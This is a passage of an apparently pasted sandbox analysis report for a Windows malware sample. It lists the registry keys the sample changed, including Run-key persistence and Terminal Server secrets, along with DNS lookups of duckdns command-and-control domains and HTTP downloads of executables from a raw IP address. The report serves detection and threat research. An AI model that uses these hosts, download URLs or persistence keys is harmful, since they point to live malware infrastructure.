  1865. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\kB_RASAPI32\\MaxFileSize",
  1866. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\kB_RASAPI32\\FileDirectory",
  1867. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VYEDE946XH",
  1868. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Type",
  1869. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
  1870. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\VaultSvc\\Type",
  1871. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  1872. "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
  1873. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
  1874. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
  1875. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
  1876. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld",
  1877. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdate",
  1878. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\DSL Subsystem",
  1879. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.vbs\\OpenWithProgids\\VBSFile",
  1880. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\qDABnKekr_RASAPI32",
  1881. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\qDABnKekr_RASAPI32\\EnableFileTracing",
  1882. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\qDABnKekr_RASAPI32\\EnableConsoleTracing",
  1883. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\qDABnKekr_RASAPI32\\FileTracingMask",
  1884. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\qDABnKekr_RASAPI32\\ConsoleTracingMask",
  1885. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\qDABnKekr_RASAPI32\\MaxFileSize",
  1886. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\qDABnKekr_RASAPI32\\FileDirectory",
  1887. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
  1888. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
  1889. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\ExceptionRecord"
  1890.  
  1891.  
  1892. * Deleted Registry Keys:
  1893. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride",
  1894. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL",
  1895. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images",
  1896. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  1897. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  1898. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  1899. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  1900. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object"
  1901.  
  1902.  
  1903. * DNS Communications:
  1904.  
  1905. "type": "A",
  1906. "request": "google.com",
  1907. "answers":
  1908.  
  1909. "data": "172.217.5.110",
  1910. "type": "A"
  1911.  
  1912.  
  1913.  
  1914.  
  1915. "type": "A",
  1916. "request": "dultrasolutions.duckdns.org",
  1917. "answers":
  1918.  
  1919. "data": "170.130.31.104",
  1920. "type": "A"
  1921.  
  1922.  
  1923.  
  1924.  
  1925. "type": "A",
  1926. "request": "absolutezeros.duckdns.org",
  1927. "answers":
  1928.  
  1929. "data": "79.134.225.32",
  1930. "type": "A"
  1931.  
  1932.  
  1933.  
  1934.  
  1935.  
  1936. * Domains:
  1937.  
  1938. "ip": "79.134.225.32",
  1939. "domain": "absolutezeros.duckdns.org"
  1940.  
  1941.  
  1942. "ip": "170.130.31.104",
  1943. "domain": "dultrasolutions.duckdns.org"
  1944.  
  1945.  
  1946. "ip": "172.217.5.110",
  1947. "domain": "google.com"
  1948.  
  1949.  
  1950.  
  1951. * Network Communication - ICMP:
  1952.  
  1953. "src": "169.254.255.254
  1954. "dst": "1.2.3.4",
  1955. "type": 8,
  1956. "data": "abcdefghijklmnopqrstuvwabcdefghi"
  1957.  
  1958.  
  1959. "src": "169.254.255.254
  1960. "dst": "1.2.3.4",
  1961. "type": 8,
  1962. "data": "abcdefghijklmnopqrstuvwabcdefghi"
  1963.  
  1964.  
  1965. "src": "169.254.255.254
  1966. "dst": "1.2.3.4",
  1967. "type": 8,
  1968. "data": "abcdefghijklmnopqrstuvwabcdefghi"
  1969.  
  1970.  
  1971. "src": "169.254.255.254
  1972. "dst": "1.2.3.4",
  1973. "type": 8,
  1974. "data": "abcdefghijklmnopqrstuvwabcdefghi"
  1975.  
  1976.  
  1977.  
  1978. * Network Communication - HTTP:
  1979.  
  1980. "count": 1,
  1981. "body": "",
  1982. "uri": "http://185.62.188.169/paso111.exe",
  1983. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  1984. "method": "GET",
  1985. "host": "185.62.188.169",
  1986. "version": "1.1",
  1987. "path": "/paso111.exe",
  1988. "data": "GET /paso111.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 185.62.188.169\r\nConnection: Keep-Alive\r\n\r\n",
  1989. "port": 80
  1990.  
  1991.  
  1992. "count": 1,
  1993. "body": "",
  1994. "uri": "http://185.62.188.169/turnx.exe",
  1995. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  1996. "method": "GET",
  1997. "host": "185.62.188.169",
  1998. "version": "1.1",
  1999. "path": "/turnx.exe",
  2000. "data": "GET /turnx.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 185.62.188.169\r\nConnection: Keep-Alive\r\n\r\n",
  2001. "port": 80
  2002.  
  2003.  
  2004.  
  2005. * Network Communication - SMTP:
  2006.  
  2007. * Network Communication - Hosts:
  2008.  
  2009. * Network Communication - IRC:
Add Comment
Please, Sign In to add comment